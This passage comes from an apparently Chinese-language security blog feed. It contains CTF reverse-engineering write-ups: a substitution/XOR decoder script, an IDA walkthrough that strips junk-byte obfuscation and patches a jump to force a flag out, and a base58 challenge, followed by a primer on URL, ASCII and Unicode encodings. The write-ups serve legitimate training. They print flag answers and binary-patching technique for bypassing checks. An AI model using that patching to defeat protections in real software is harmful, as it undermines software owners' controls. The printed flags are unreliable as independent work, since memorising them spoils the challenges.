class="number">0xD6</span>, <span class="number">0xB3</span>, <span class="number">0x29</span>, <span class="number">0xE3</span>, <span class="number">0x2F</span>, <span class="number">0x84</span>,</span><br><span class="line"> <span class="number">0x53</span>, <span class="number">0xD1</span>, <span class="number">0x00</span>, <span class="number">0xED</span>, <span class="number">0x20</span>, <span class="number">0xFC</span>, <span class="number">0xB1</span>, <span class="number">0x5B</span>, <span class="number">0x6A</span>, <span class="number">0xCB</span>,</span><br><span class="line"> <span class="number">0xBE</span>, <span class="number">0x39</span>, <span class="number">0x4A</span>, <span class="number">0x4C</span>, <span class="number">0x58</span>, <span class="number">0xCF</span>, <span class="number">0xD0</span>, <span class="number">0xEF</span>, <span class="number">0xAA</span>, <span class="number">0xFB</span>,</span><br><span class="line"> <span class="number">0x43</span>, <span class="number">0x4D</span>, <span class="number">0x33</span>, <span class="number">0x85</span>, <span class="number">0x45</span>, <span class="number">0xF9</span>, <span class="number">0x02</span>, <span class="number">0x7F</span>, <span class="number">0x50</span>, <span class="number">0x3C</span>,</span><br><span class="line"> <span class="number">0x9F</span>, <span class="number">0xA8</span>, <span class="number">0x51</span>, <span class="number">0xA3</span>, <span class="number">0x40</span>, <span class="number">0x8F</span>, <span class="number">0x92</span>, <span class="number">0x9D</span>, <span class="number">0x38</span>, <span class="number">0xF5</span>,</span><br><span class="line"> <span class="number">0xBC</span>, <span class="number">0xB6</span>, <span class="number">0xDA</span>, <span class="number">0x21</span>, <span class="number">0x10</span>, <span class="number">0xFF</span>, <span class="number">0xF3</span>, <span class="number">0xD2</span>, <span class="number">0xCD</span>, <span class="number">0x0C</span>,</span><br><span class="line"> <span class="number">0x13</span>, <span class="number">0xEC</span>, <span class="number">0x5F</span>, <span class="number">0x97</span>, <span class="number">0x44</span>, <span class="number">0x17</span>, <span class="number">0xC4</span>, <span class="number">0xA7</span>, <span class="number">0x7E</span>, <span class="number">0x3D</span>,</span><br><span class="line"> <span class="number">0x64</span>, <span class="number">0x5D</span>, <span class="number">0x19</span>, <span class="number">0x73</span>, <span class="number">0x60</span>, <span class="number">0x81</span>, <span class="number">0x4F</span>, <span class="number">0xDC</span>, <span class="number">0x22</span>, <span class="number">0x2A</span>,</span><br><span class="line"> <span class="number">0x90</span>, <span class="number">0x88</span>, <span class="number">0x46</span>, <span class="number">0xEE</span>, <span class="number">0xB8</span>, <span class="number">0x14</span>, <span class="number">0xDE</span>, <span class="number">0x5E</span>, <span class="number">0x0B</span>, <span class="number">0xDB</span>,</span><br><span class="line"> <span class="number">0xE0</span>, <span class="number">0x32</span>, <span class="number">0x3A</span>, <span class="number">0x0A</span>, <span class="number">0x49</span>, <span class="number">0x06</span>, <span class="number">0x24</span>, <span class="number">0x5C</span>, <span class="number">0xC2</span>, <span class="number">0xD3</span>,</span><br><span class="line"> <span class="number">0xAC</span>, <span class="number">0x62</span>, <span class="number">0x91</span>, <span class="number">0x95</span>, <span class="number">0xE4</span>, <span class="number">0x79</span>, <span class="number">0xE7</span>, <span class="number">0xC8</span>, <span class="number">0x37</span>, <span class="number">0x6D</span>,</span><br><span class="line"> <span class="number">0x8D</span>, <span class="number">0xD5</span>, <span class="number">0x4E</span>, <span class="number">0xA9</span>, <span class="number">0x6C</span>, <span class="number">0x56</span>, <span class="number">0xF4</span>, <span class="number">0xEA</span>, <span class="number">0x65</span>, <span class="number">0x7A</span>,</span><br><span class="line"> <span class="number">0xAE</span>, <span class="number">0x08</span>, <span class="number">0xBA</span>, <span class="number">0x78</span>, <span class="number">0x25</span>, <span class="number">0x2E</span>, <span class="number">0x1C</span>, <span class="number">0xA6</span>, <span class="number">0xB4</span>, <span class="number">0xC6</span>,</span><br><span class="line"> <span class="number">0xE8</span>, <span class="number">0xDD</span>, <span class="number">0x74</span>, <span class="number">0x1F</span>, <span class="number">0x4B</span>, <span class="number">0xBD</span>, <span class="number">0x8B</span>, <span class="number">0x8A</span>, <span class="number">0x70</span>, <span class="number">0x3E</span>,</span><br><span class="line"> <span class="number">0xB5</span>, <span class="number">0x66</span>, <span class="number">0x48</span>, <span class="number">0x03</span>, <span class="number">0xF6</span>, <span class="number">0x0E</span>, <span class="number">0x61</span>, <span class="number">0x35</span>, <span class="number">0x57</span>, <span class="number">0xB9</span>,</span><br><span class="line"> <span class="number">0x86</span>, <span class="number">0xC1</span>, <span class="number">0x1D</span>, <span class="number">0x9E</span>, <span class="number">0xE1</span>, <span class="number">0xF8</span>, <span class="number">0x98</span>, <span class="number">0x11</span>, <span class="number">0x69</span>, <span class="number">0xD9</span>,</span><br><span class="line"> <span class="number">0x8E</span>, <span class="number">0x94</span>, <span class="number">0x9B</span>, <span class="number">0x1E</span>, <span class="number">0x87</span>, <span class="number">0xE9</span>, <span class="number">0xCE</span>, <span class="number">0x55</span>, <span class="number">0x28</span>, <span class="number">0xDF</span>,</span><br><span class="line"> <span class="number">0x8C</span>, <span class="number">0xA1</span>, <span class="number">0x89</span>, <span class="number">0x0D</span>, <span class="number">0xBF</span>, <span class="number">0xE6</span>, <span class="number">0x42</span>, <span class="number">0x68</span>, <span class="number">0x41</span>, <span class="number">0x99</span>,</span><br><span class="line"> <span class="number">0x2D</span>, <span class="number">0x0F</span>, <span class="number">0xB0</span>, <span class="number">0x54</span>, <span class="number">0xBB</span>, <span class="number">0x16</span>]</span><br><span class="line">s = bytes.fromhex(<span class="string">"2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(s)):</span><br><span class="line"> v = table.index(s[i]^<span class="number">0x19</span>)</span><br><span class="line"> print(chr(v), end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure></div><p>得到flag</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}</span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<h3 id="2018湘湖杯逆向题"><a href="#2018湘湖杯逆向题" class="headerlink" title="2018湘湖杯逆向题"></a>2018湘湖杯逆向题</h3>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>echo-server</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/17/echo-server/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/17/echo-server/</id>
<published>2020-12-17T07:57:25.682Z</published>
<updated>2021-01-11T01:42:26.603Z</updated>
<content type="html"><![CDATA[<p>XCTF 3rd-NJCTF-2017</p><a id="more"></a><h3 id="0x01-查壳"><a href="#0x01-查壳" class="headerlink" title="0x01.查壳"></a>0x01.查壳</h3><p>使用ExeinfoPe工具查壳,可以发现是32位程序,没有壳</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/WN8wG1tdH9ID5bX.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="0x02-使用IDA进行反编译"><a href="#0x02-使用IDA进行反编译" class="headerlink" title="0x02.使用IDA进行反编译"></a>0x02.使用IDA进行反编译</h3><p>使用32位的IDA打开程序</p><h3 id="0x03-分析程序"><a href="#0x03-分析程序" class="headerlink" title="0x03.分析程序"></a>0x03.分析程序</h3><p>题目提示”输入密钥,得到flag.”<br>定位到main函数,并使用F5大法查看伪代码</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/hJkSTpsnbQ1ogHK.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这个程序的main函数伪代码比较清晰,根据伪代码可知程序main函数中只有一个关键函数,但是这个函数调用比较奇怪。猜测这里可能有问题。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line">((<span class="keyword">void</span> (*)(<span class="keyword">void</span>))((<span class="keyword">char</span> *)&loc_80487C1 + <span class="number">3</span>))();</span><br></pre></td></tr></table></figure></div><p>我们切回汇编代码,直接看汇编代码</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/31pxl2iAOFP5R9q.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>我们双击这个函数,跟去这个函数看下</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/ZqF3svJhkOITYXW.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>双击后程序跳转到这里了,根据main函数中的那个call,我们可以知道,程序应该跳转到<code>loc_80487C1+3</code>处,但是跳转过来后,发现汇编代码却乱七八糟的,得知程序被混淆了;我们需要想办法去除花指令。<br>在<code>0x080487C1</code>处按下D键把此处的汇编代码转换为数据,我在此处按了两次D键才转换完成。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/kRunCHvQdAm31pG.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><code>0x80487C1</code>处应该变成这样,我们发现<code>0x80487C1</code>处的字节是0xE8,这个0xE8经常用于混淆,使用IDA把它patch为0x90,在<code>0x80487C2</code>处按下C键,我们会看到IDA分析<code>0x80487C2、0x80487C3</code>的汇编代码显示正常,我们返回main函数看一眼那个call,发现那个call变成了<code>call near ptr unk_80487C4</code>,我们回到<code>unk_80487C4</code>处,按下C键。会发现IDA分析的汇编代码和正常的函数开通差不多了。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/KkRU7MtAq8yIfud.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>接着往下看</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/FdtpmjP91JX7DlU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>发现这里出现了一个和之前main函数中的函数调用一样诡异的jmp,<code>jmp short near ptr loc_80487F3+1</code>我们可以仔细观察一些,可以发现这条指令占了两个字节,这条指令本身的意思就是跳到自己的第二个字节处,因此我们可以理解为这题指令就是相当于把第一个字节nop掉。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/9n3pQcmTCqhGIBZ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>我门看下机器码,发现<code>0x80487F3</code>处的字节0xE8,0xE8也经常被用于混淆,再结合我们上一步的分析,可以得知这里就是用0xE8来干扰IDA的静态分析,我们直接把0xE8patch为0x90。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/In6Fe3blwKksxaO.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>然后可以观察到,又有一块汇编代码恢复正常。然后我发现<code>0x08048816</code>处有一个地址被IDA标红。我们观察下发现<code>0x08048816</code>前面的两行汇编代码相当于无条件跳转</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">xor</span> eax, eax</span><br><span class="line">jz short loc_804881D</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/YF98Jj4iOboLqum.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>然后在<code>0x08048816</code>后面发现有一处比较,其中一个参数是地址是<code>0x8048817h</code>,因此我猜测此处的<code>0x08048816</code>处的几个字节的数据可能不是代码,而是数据,使用D转换为数据看下</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/p4CofPbSYNyLr2g.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>发现果然是数据,我们在<code>0x08048817</code>按A,把数据转为字符串</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/Tn5Pz2wWJtXBKUv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>在字符串的下方有一处比较,还有一句”You are very close! Now patch me~”<br>因此我们得知程序需要用户输入的字符串是”F1@gA”,我们运行程序尝试下</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/ji8WHGM2JR1uTdK.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>发现确实通过比较了,但是并未输出flag,程序提示需要patch,我们接着往下看,找下程序为什么会卡在这。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/kevYh7iaBxWG1X5.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>我们发现这里又有奇怪的跳转,我们使用之前的方法恢复下,尝试了下还是比较奇怪,先不管他,我有看到在”You are very close! Now patch me~”下方有个跳转</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/W6J4ts3zwGSfumg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>发现这里是根据<code>dword_804A088</code>的值来决定是否跳转的,在<code>dword_804A088</code>上按下X键,使用交叉引用,看下<code>dword_804A088</code>这个地址的值是哪来的,</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/Au9JcpmniwZ5QgU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure>过去看下<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/HgM7FnUdhxEVAjf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>发现<code>dword_804A088</code>这个地址的值是在main函数中硬编码的1,</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/SX1QFjmkRoTxhzl.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>知道EAX的值为1,<code>test eax,eax</code>置z标志位为0,z标志位为0时jz不跳转,所以此处的jz没有跳转<br>对此处进行patch,改为jmp,然后保存程序。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/YkN31GgIVDPszoF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>成功得到flag:F8C60EB40BF66919A77C4BD88D45DEF4</p>]]></content>
<summary type="html">
<p>XCTF 3rd-NJCTF-2017</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>test_re</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/17/test_re/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/17/test_re/</id>
<published>2020-12-17T07:35:41.374Z</published>
<updated>2021-01-11T01:42:43.950Z</updated>
<content type="html"><![CDATA[<p>2019_西湖论剑_预选赛</p><a id="more"></a><p>Base58的码表:123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ</p><p>9位数字以及去掉了英文字母容易造成混淆的字母(0:数字零,O:大写O,I:大写i,l:小写L)所组成</p><p>编码流程:</p><p>① 将所要编码的字符串转为ASCII码(ASCII码实际上也就是256进制的数)</p><p>例如将”ABD”转为 65 66 68</p><p>② 然后再将256进制转为10进制数,65<em>256</em>256+66*256+68=4276804</p><p>③ 最后将十进制数转为58进制,即模58转化,最后得到21 53 20 0</p><p>④ 根据21 53 20 0查表中所对应的字符得到base58编码的密文:nVm1</p><p>解码流程与其编码流程相反</p><p>总结,编码就是将所要加密的字符先转256进制,再转10进制再转为58进制,最后查码表;解码就是查码表得到58进制,再转10进制最后再转256进制最后通过ascii码表转为字符。</p><p>查壳,无壳,64位文件。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/GOS78lKai1u4UcI.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>拖入ida查看主函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/ZuwpfOI3U6oSPGr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>经过分析,sub_400D00函数内容大致意思是输入字符串</p><p>查看sub_400700函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/Ib89PemyNpDth23.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>根据意思,s应该是经过某种加密操作后的字符串,后面的D9 cS9N 等等应该就是密文了,密文应该是D9cS9N9iHjMLTdA8YSMRMp(仔细看s后面加了数字,如s+2),通过分析可以知道s被v11所赋值的,所以主要看v11,这里的过程还被加入了其他变量的操作来混淆,主要看有关v11的加密操作过程即可</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/1cx5JXpHdglKyjs.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>根据上面base58的原理,所以这里的算法为base58的加密过程</p><p>将字符串D9cS9N9iHjMLTdA8YSMRMp进行解密即可</p><p>得到flag{base58_is_boring}</p>]]></content>
<summary type="html">
<p>2019_西湖论剑_预选赛</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>网安作业-常见编码</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/13/URL%E7%BC%96%E7%A0%81/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/13/URL%E7%BC%96%E7%A0%81/</id>
<published>2020-12-13T11:34:15.791Z</published>
<updated>2020-12-17T08:14:45.149Z</updated>
<content type="html"><![CDATA[<p>转载自海里大佬!</p><a id="more"></a><h3 id="URL编码"><a href="#URL编码" class="headerlink" title="URL编码"></a>URL编码</h3><p>URI所允许的字符分作<strong>保留</strong>与<strong>未保留</strong>。<strong>保留</strong>字符是那些具有特殊含义的字符,例如:<a href="https://zh.wikipedia.org/wiki/斜線" target="_blank" rel="noopener">斜线</a>字符用于URL(或URI)不同部分的分界符;<strong>未保留</strong>字符没有这些特殊含义。百分号编码把保留字符表示为特殊字符序列。上述情形随URI与URI的不同版本规格会有轻微的变化。</p><h4 id="对保留字符的百分号编码"><a href="#对保留字符的百分号编码" class="headerlink" title="对保留字符的百分号编码"></a>对保留字符的百分号编码</h4><p>首先需要把该字符的ASCII的值表示为两个16进制的数字,然后在其前面放置<a href="https://zh.wikipedia.org/wiki/转义字符" target="_blank" rel="noopener">转义字符</a>(“<code>%</code>“),置入URI中的相应位置。</p><h4 id="对未保留字符的百分号编码"><a href="#对未保留字符的百分号编码" class="headerlink" title="对未保留字符的百分号编码"></a>对未保留字符的百分号编码</h4><p>未保留字符不需要百分号编码.</p><h4 id="对百分号字符的百分号编码"><a href="#对百分号字符的百分号编码" class="headerlink" title="对百分号字符的百分号编码"></a>对百分号字符的百分号编码</h4><p>由于百分号字符(“%”)表示百分号编码字节流的存在, 因此百分号字符应该被编码为3个字节的序列:”%25”,用于URI内部(0x25为%的ascii码)</p><p>编码表可以简单的以ASCII码表为准(见下)</p><p><a href="https://zh.wikipedia.org/wiki/百分号编码" target="_blank" rel="noopener">URL编码_wiki百科</a></p><h2 id="ASCII编码"><a href="#ASCII编码" class="headerlink" title="ASCII编码"></a>ASCII编码</h2><p>ASCII 由电报码发展而来,经过多次更新至今为止共定义了128个字符;其中33个字符无法显示(一些终端提供了扩展,使得这些字符可显示为诸如笑脸、扑克牌花式等8-bit符号),且这33个字符多数都已是陈废的<a href="https://zh.wikipedia.org/wiki/控制字元" target="_blank" rel="noopener">控制字符</a>。控制字符的用途主要是用来操控已经处理过的文字。<br>可以简单的分为控制字符和可显示字符</p><p>用十进制来表示的话,031+127位为控制字符,32126为可显示字符,其中48~57为0到9十个阿拉伯数字。65~90为26个大写英文字母,97~122号为26个小写英文字母,其余为一些标点符号、运算符号等</p><p><a href="https://zh.wikipedia.org/wiki/ASCII" target="_blank" rel="noopener">ASCII_wiki百科</a></p><h2 id="Unicode码"><a href="#Unicode码" class="headerlink" title="Unicode码"></a>Unicode码</h2><p><a href="https://baike.baidu.com/item/Unicode" target="_blank" rel="noopener">Unicode</a>是一个编码方案,Unicode 是为了解决传统的字符编码方案的局限而产生的,它为每种语言中的每个字符设定了统一并且唯一的<a href="https://baike.baidu.com/item/二进制" target="_blank" rel="noopener">二进制</a>编码,以满足跨语言、跨平台进行文本转换、处理的要求。Unicode 编码共有三种具体实现,分别为utf-8,utf-16,utf-32,其中utf-8占用一到四个字节,utf-16占用二或四个字节,utf-32占用四个字节。</p><p>Unicode码扩展自ASCII<a href="https://baike.baidu.com/item/字元集" target="_blank" rel="noopener">字元集</a>。Unicode使用全16位元字元集。这使得Unicode能够表示世界上所有的书写语言中可能用於电脑通讯的字元、象形文字和其他符号。</p><p>Unicode最初打算作为ASCII的补充,可能的话,最终将代替它。</p><p>Unicode码一直在修正扩充,目前已经包含的文字有:<a href="https://zh.wikipedia.org/wiki/阿拉伯字母" target="_blank" rel="noopener">阿拉伯字母</a>、<a href="https://zh.wikipedia.org/wiki/亞美尼亞字母" target="_blank" rel="noopener">亚美尼亚字母</a>、<a href="https://zh.wikipedia.org/wiki/孟加拉文" target="_blank" rel="noopener">孟加拉文</a>、<a href="https://zh.wikipedia.org/wiki/注音符號" target="_blank" rel="noopener">注音符号</a>、<a href="https://zh.wikipedia.org/wiki/西里爾字母" target="_blank" rel="noopener">西里尔字母</a>、<a href="https://zh.wikipedia.org/wiki/天城文" target="_blank" rel="noopener">天城文</a>、<a href="https://zh.wikipedia.org/wiki/格鲁吉亚字母" target="_blank" rel="noopener">格鲁吉亚字母</a>、<a href="https://zh.wikipedia.org/wiki/希臘字母" target="_blank" rel="noopener">希腊字母</a>、<a href="https://zh.wikipedia.org/wiki/古吉拉特文" target="_blank" rel="noopener">古吉拉特文</a>、<a href="https://zh.wikipedia.org/wiki/古木基文" target="_blank" rel="noopener">古木基文</a>、<a href="https://zh.wikipedia.org/wiki/諺文" target="_blank" rel="noopener">谚文</a>、<a href="https://zh.wikipedia.org/wiki/希伯來字母" target="_blank" rel="noopener">希伯来字母</a>、<a href="https://zh.wikipedia.org/wiki/平假名" target="_blank" rel="noopener">平假名</a>、<a href="https://zh.wikipedia.org/wiki/卡納達文" target="_blank" rel="noopener">卡纳达文</a>、<a href="https://zh.wikipedia.org/wiki/片假名" target="_blank" rel="noopener">片假名</a>、<a href="https://zh.wikipedia.org/wiki/寮文字" target="_blank" rel="noopener">寮文字</a>、<a href="https://zh.wikipedia.org/wiki/拉丁字母" target="_blank" rel="noopener">拉丁字母</a>、<a href="https://zh.wikipedia.org/wiki/馬拉雅拉姆文" target="_blank" rel="noopener">马拉雅拉姆文</a>、<a href="https://zh.wikipedia.org/wiki/奧里亞文" target="_blank" rel="noopener">奥里亚文</a>、<a href="https://zh.wikipedia.org/wiki/泰米爾文" target="_blank" rel="noopener">泰米尔文</a>、<a href="https://zh.wikipedia.org/wiki/泰卢固文" target="_blank" rel="noopener">泰卢固文</a>、<a href="https://zh.wikipedia.org/wiki/泰文字" target="_blank" rel="noopener">泰文字</a>、<a href="https://zh.wikipedia.org/wiki/歐元符號" target="_blank" rel="noopener">欧元符号</a>、对象替换字符、<a href="https://zh.wikipedia.org/wiki/切罗基文" target="_blank" rel="noopener">切罗基文</a>,<a href="https://zh.wikipedia.org/wiki/吉茲字母" target="_blank" rel="noopener">吉兹字母</a>,<a href="https://zh.wikipedia.org/wiki/高棉字母" target="_blank" rel="noopener">高棉字母</a>,<a href="https://zh.wikipedia.org/wiki/蒙古字母" target="_blank" rel="noopener">蒙古字母</a>,<a href="https://zh.wikipedia.org/wiki/缅文" target="_blank" rel="noopener">缅文</a>,<a href="https://zh.wikipedia.org/wiki/歐甘字母" target="_blank" rel="noopener">欧甘字母</a>,<a href="https://zh.wikipedia.org/wiki/卢恩字母" target="_blank" rel="noopener">卢恩字母</a>,<a href="https://zh.wikipedia.org/wiki/僧伽羅文" target="_blank" rel="noopener">僧伽罗文</a>,<a href="https://zh.wikipedia.org/wiki/敘利亞字母" target="_blank" rel="noopener">叙利亚字母</a>,<a href="https://zh.wikipedia.org/wiki/它拿字母" target="_blank" rel="noopener">它拿字母</a>,<a href="https://zh.wikipedia.org/wiki/加拿大原住民音節文字" target="_blank" rel="noopener">加拿大原住民音节文字</a>、<a href="https://zh.wikipedia.org/wiki/彝文" target="_blank" rel="noopener">彝文</a><br>、部分盲文图案、<a href="https://zh.wikipedia.org/w/index.php?title=德瑟雷特字母&action=edit&redlink=1" target="_blank" rel="noopener">德瑟雷特字母</a>、<a href="https://zh.wikipedia.org/wiki/哥特字母" target="_blank" rel="noopener">哥特字母</a>、<a href="https://zh.wikipedia.org/wiki/古意大利字母" target="_blank" rel="noopener">古意大利字母</a>、<a href="https://zh.wikipedia.org/wiki/音樂符號" target="_blank" rel="noopener">音乐符号</a>、<a href="https://zh.wikipedia.org/wiki/拜占庭音乐符号" target="_blank" rel="noopener">拜占庭音乐符号</a>,<a href="https://zh.wikipedia.org/wiki/中日韩统一表意文字" target="_blank" rel="noopener">中日韩统一表意文字</a>、<a href="https://zh.wikipedia.org/wiki/菲律宾" target="_blank" rel="noopener">菲律宾</a>文字<a href="https://zh.wikipedia.org/wiki/布锡文" target="_blank" rel="noopener">布锡文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=哈努诺文&action=edit&redlink=1" target="_blank" rel="noopener">哈努诺文</a>、<a href="https://zh.wikipedia.org/wiki/他加祿文" target="_blank" rel="noopener">他加禄文</a>、<a href="https://zh.wikipedia.org/w/index.php?title=塔格巴奴亚文&action=edit&redlink=1" target="_blank" rel="noopener">塔格巴奴亚文</a>、<a href="https://zh.wikipedia.org/wiki/塞浦路斯音节文字" target="_blank" rel="noopener">塞浦路斯音节文字</a>,<a href="https://zh.wikipedia.org/w/index.php?title=林布字母&action=edit&redlink=1" target="_blank" rel="noopener">林布字母</a>,<a href="https://zh.wikipedia.org/wiki/线形文字B" target="_blank" rel="noopener">线形文字B</a>,<a href="https://zh.wikipedia.org/wiki/奧斯曼亞字母" target="_blank" rel="noopener">奥斯曼亚字母</a>,<a href="https://zh.wikipedia.org/wiki/蕭伯納字母" target="_blank" rel="noopener">萧伯纳字母</a>,<a href="https://zh.wikipedia.org/wiki/德宏傣文" target="_blank" rel="noopener">德宏傣文</a>,<a href="https://zh.wikipedia.org/wiki/乌加里特字母" target="_blank" rel="noopener">乌加里特字母</a>、<a href="https://zh.wikipedia.org/wiki/六十四卦" target="_blank" rel="noopener">六十四卦</a>、<a href="https://zh.wikipedia.org/w/index.php?title=布吉文&action=edit&redlink=1" target="_blank" rel="noopener">布吉文</a>,<a href="https://zh.wikipedia.org/wiki/格拉哥里字母" target="_blank" rel="noopener">格拉哥里字母</a>,<a href="https://zh.wikipedia.org/wiki/佉卢文" target="_blank" rel="noopener">佉卢文</a>,<a href="https://zh.wikipedia.org/wiki/西双版纳傣文" target="_blank" rel="noopener">西双版纳傣文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=古波斯文&action=edit&redlink=1" target="_blank" rel="noopener">古波斯文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=锡尔赫特文&action=edit&redlink=1" target="_blank" rel="noopener">锡尔赫特文</a>、<a href="https://zh.wikipedia.org/wiki/提非納文" target="_blank" rel="noopener">提非纳文</a> 、<a href="https://zh.wikipedia.org/w/index.php?title=古希腊音乐符号&action=edit&redlink=1" target="_blank" rel="noopener">古希腊音乐符号</a>、<a href="https://zh.wikipedia.org/wiki/巴厘文" target="_blank" rel="noopener">巴厘文</a>,<a href="https://zh.wikipedia.org/wiki/楔形文字" target="_blank" rel="noopener">楔形文字</a>,<a href="https://zh.wikipedia.org/wiki/西非书面文字" target="_blank" rel="noopener">西非书面文字</a>,<a href="https://zh.wikipedia.org/wiki/八思巴文" target="_blank" rel="noopener">八思巴文</a>、<a href="https://zh.wikipedia.org/wiki/腓尼基字母" target="_blank" rel="noopener">腓尼基字母</a>、<a href="https://zh.wikipedia.org/w/index.php?title=卡利亚文&action=edit&redlink=1" target="_blank" rel="noopener">卡利亚文</a>,<a href="https://zh.wikipedia.org/wiki/占婆字母" target="_blank" rel="noopener">占婆字母</a>,<a href="https://zh.wikipedia.org/w/index.php?title=克耶黎文&action=edit&redlink=1" target="_blank" rel="noopener">克耶黎文</a>,<a href="https://zh.wikipedia.org/wiki/绒巴文" target="_blank" rel="noopener">绒巴文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=利西亚文&action=edit&redlink=1" target="_blank" rel="noopener">利西亚文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=吕底亚文&action=edit&redlink=1" target="_blank" rel="noopener">吕底亚文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=桑塔利文&action=edit&redlink=1" target="_blank" rel="noopener">桑塔利文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=拉让文&action=edit&redlink=1" target="_blank" rel="noopener">拉让文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=索拉什特拉文&action=edit&redlink=1" target="_blank" rel="noopener">索拉什特拉文</a>,<a href="https://zh.wikipedia.org/w/index.php?title=巽他文&action=edit&redlink=1" target="_blank" rel="noopener">巽他文</a>、<a 